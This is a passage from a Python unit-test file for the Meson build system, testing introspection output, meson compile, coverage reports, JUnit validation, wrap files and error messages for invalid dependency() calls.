self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
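        # Introspecting targets straight from meson.build (no build directory) should
        # match the configured result once fields only known after configuration
        # (custom targets, install names, per-language source groups) are normalized.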
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
res_wb = [i for i in res_wb if i['type'] != 'custom']
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
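        # Validate the AST dump produced by `meson introspect --ast` by walking every
        # node recursively and checking its keys and value types.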
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
node_counter = {}
def accept_node(json_node):
self.assertIsInstance(json_node, dict)
for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
self.assertIn(i, json_node)
self.assertIsInstance(json_node[i], int)
self.assertIn('node', json_node)
n = json_node['node']
self.assertIsInstance(n, str)
self.assertIn(n, nodes)
if n not in node_counter:
node_counter[n] = 0
node_counter[n] = node_counter[n] + 1
for nodeDesc in nodes[n]:
key = nodeDesc[0]
func = nodeDesc[1]
self.assertIn(key, json_node)
if func is None:
tp = nodeDesc[2]
self.assertIsInstance(json_node[key], tp)
continue
func(json_node[key])
def accept_node_list(node_list):
self.assertIsInstance(node_list, list)
for i in node_list:
accept_node(i)
def accept_kwargs(kwargs):
self.assertIsInstance(kwargs, list)
for i in kwargs:
self.assertIn('key', i)
self.assertIn('val', i)
accept_node(i['key'])
accept_node(i['val'])
nodes = {
'BooleanNode': [('value', None, bool)],
'IdNode': [('value', None, str)],
'NumberNode': [('value', None, int)],
'StringNode': [('value', None, str)],
'ContinueNode': [],
'BreakNode': [],
'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
'ArrayNode': [('args', accept_node)],
'DictNode': [('args', accept_node)],
'EmptyNode': [],
'OrNode': [('left', accept_node), ('right', accept_node)],
'AndNode': [('left', accept_node), ('right', accept_node)],
'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
'NotNode': [('right', accept_node)],
'CodeBlockNode': [('lines', accept_node_list)],
'IndexNode': [('object', accept_node), ('index', accept_node)],
'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
'FunctionNode': [('args', accept_node), ('name', None, str)],
'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
'IfNode': [('condition', accept_node), ('block', accept_node)],
'UMinusNode': [('right', accept_node)],
'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
}
accept_node(res_nb)
for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
self.assertIn(n, node_counter)
self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
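        # `--scan-dependencies` on the source tree should list every dependency()
        # call, including optional, conditional and fallback ones, with their
        # version requirements.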
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
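        # After a plain build neither output should exist; running the 'build-all'
        # alias must produce both the executable and the custom target output.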
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
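        # Running `meson configure` on an existing build directory with no extra
        # arguments should succeed.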
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
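        # The summary() block printed at the end of configure must match the expected
        # text, including the subproject summaries and the failed-subproject notice.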
testdir = os.path.join(self.unit_test_dir, '73 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Plugins
long coma list: alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
autodetect, avi
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
def get_exe_name(basename: str) -> str:
if is_windows():
return '{}.exe'.format(basename)
else:
return basename
def get_shared_lib_name(basename: str) -> str:
if mesonbuild.environment.detect_msys2_arch():
return 'lib{}.dll'.format(basename)
elif is_windows():
return '{}.dll'.format(basename)
elif is_cygwin():
return 'cyg{}.dll'.format(basename)
elif is_osx():
return 'lib{}.dylib'.format(basename)
else:
return 'lib{}.so'.format(basename)
def get_static_lib_name(basename: str) -> str:
return 'lib{}.a'.format(basename)
# Base case (no targets or additional arguments)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
# `--clean`
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
# Target specified in a project with unique names
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--wipe'])
# Multiple targets and target type specified
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
# Check that we have a shared lib, but not an executable, i.e. check that target actually worked
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
        # Target specified in a project with non-unique names
testdir = os.path.join(self.common_test_dir, '190 same target name')
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
# run_target
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir, extra_args=['--wipe'])
out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
self.assertIn('I am Python3.', out)
# `--$BACKEND-args`
testdir = os.path.join(self.common_test_dir, '1 trivial')
if self.backend is Backend.ninja:
self.init(testdir, extra_args=['--wipe'])
# Dry run - should not create a program
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
elif self.backend is Backend.vs:
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir])
            # Explicitly clean the target through the msbuild interface
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '75 dep files')
# Regression test: Spurious reconfigure was happening when build
# directory is inside source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During first configure the file did not exist so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
        # During the reconfigure the file did exist, but it is inside the build
        # directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
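        # Helper: configure and run the given test case, then validate the generated
        # JUnit XML in meson-logs against the schema shipped with the test suite.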
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '213 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '44 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '232 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
def test_commands_documented(self):
'''
Test that all listed meson commands are documented in Commands.md.
'''
# The docs directory is not in release tarballs.
if not os.path.isdir('docs'):
raise unittest.SkipTest('Doc directory does not exist.')
doc_path = 'docs/markdown_dynamic/Commands.md'
md = None
with open(doc_path, encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
## Get command sections
section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
md_command_section_matches = [i for i in section_pattern.finditer(md)]
md_command_sections = dict()
for i, s in enumerate(md_command_section_matches):
section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
md_command_sections[s.group(1)] = (s.start(), section_end)
## Validate commands
md_commands = set(k for k,v in md_command_sections.items())
help_output = self._run(self.meson_command + ['--help'])
help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(','))
self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path))
## Validate that each section has proper placeholders
def get_data_pattern(command):
return re.compile(
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'usage\'\] }}[\r\n]'
r'^```[\r\n]'
r'.*?'
r'^```[\r\n]'
r'{{ cmd_help\[\'' + command + r'\'\]\[\'arguments\'\] }}[\r\n]'
r'^```',
flags = re.MULTILINE|re.DOTALL)
for command in md_commands:
m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path))
def _check_coverage_files(self, types=('text', 'xml', 'html')):
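        # Helper: assert that the requested coverage report types were written to
        # <builddir>/meson-logs by the coverage targets.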
covdir = Path(self.builddir) / 'meson-logs'
files = []
if 'text' in types:
files.append('coverage.txt')
if 'xml' in types:
files.append('coverage.xml')
if 'html' in types:
files.append('coveragereport/index.html')
for f in files:
self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f))
def test_coverage(self):
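        # The plain 'coverage' run_target should produce text, XML and HTML reports;
        # requires gcovr (and llvm-cov when the compiler is clang).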
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_complex(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '109 generatorcustom')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_html(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
self._check_coverage_files(['html'])
def test_coverage_text(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-text')
self._check_coverage_files(['text'])
def test_coverage_xml(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-xml')
self._check_coverage_files(['xml'])
def test_cross_file_constants(self):
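        # [constants] defined in an earlier machine file should be usable in a later
        # machine file and in its other sections, via string concatenation and the
        # path-joining '/' operator.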
with temp_filename() as crossfile1, temp_filename() as crossfile2:
with open(crossfile1, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
compiler = 'gcc'
'''))
with open(crossfile2, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
toolchain = '/toolchain/'
common_flags = ['--sysroot=' + toolchain / 'sysroot']
[properties]
c_args = common_flags + ['-DSOMETHING']
cpp_args = c_args + ['-DSOMETHING_ELSE']
[binaries]
c = toolchain / compiler
'''))
values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
self.assertEqual(values['properties']['c_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
self.assertEqual(values['properties']['cpp_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
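        # A [wrap-git] wrap pointing at a local upstream repository (with a
        # patch_directory providing the build definition) should configure, build
        # and pass its tests.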
with tempfile.TemporaryDirectory() as tmpdir:
srcdir = os.path.join(tmpdir, 'src')
shutil.copytree(os.path.join(self.unit_test_dir, '81 wrap-git'), srcdir)
upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
upstream_uri = Path(upstream).as_uri()
_git_init(upstream)
with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = {}
patch_directory = wrap_git_builddef
revision = master
'''.format(upstream_uri)))
self.init(srcdir)
self.build()
self.run_tests()
def test_multi_output_custom_target_no_warning(self):
testdir = os.path.join(self.common_test_dir, '235 custom_target source')
out = self.init(testdir)
self.assertNotRegex(out, 'WARNING:.*Using the first one.')
self.build()
self.run_tests()
@unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None),
'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners')
def test_nostdlib(self):
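        # Use a machine file to replace the C stdlib with 'mylibc', first as a native
        # file and then as a cross file, and check that the project still builds.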
testdir = os.path.join(self.unit_test_dir, '79 nostdlib')
machinefile = os.path.join(self.builddir, 'machine.txt')
with open(machinefile, 'w') as f:
f.write(textwrap.dedent('''
[properties]
c_stdlib = 'mylibc'
'''))
# Test native C stdlib
self.meson_native_file = machinefile
self.init(testdir)
self.build()
# Test cross C stdlib
self.new_builddir()
self.meson_native_file = None
self.meson_cross_file = machinefile
self.init(testdir)
self.build()
def test_meson_version_compare(self):
testdir = os.path.join(self.unit_test_dir, '82 meson version compare')
out = self.init(testdir)
self.assertNotRegex(out, r'WARNING')
def test_wrap_redirect(self):
redirect_wrap = os.path.join(self.builddir, 'redirect.wrap')
real_wrap = os.path.join(self.builddir, 'foo/subprojects/real.wrap')
os.makedirs(os.path.dirname(real_wrap))
# Invalid redirect, filename must have .wrap extension
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/subprojects/real.wrapper
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be a .wrap file'):
PackageDefinition(redirect_wrap)
# Invalid redirect, filename cannot be in parent directory
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = ../real.wrap
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename cannot contain ".."'):
PackageDefinition(redirect_wrap)
# Invalid redirect, filename must be in foo/subprojects/real.wrap
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/real.wrap
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be in the form foo/subprojects/bar.wrap'):
wrap = PackageDefinition(redirect_wrap)
# Correct redirect
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/subprojects/real.wrap
'''))
with open(real_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = http://invalid
'''))
wrap = PackageDefinition(redirect_wrap)
self.assertEqual(wrap.get('url'), 'http://invalid')
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
        an error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
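        # Helper: write a minimal project containing @contents and return the output
        # of configuring it in-process.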
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
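        # Pairs of (meson.build snippet, expected error regex) for invalid
        # dependency() keyword arguments and a not-found dependency.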
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
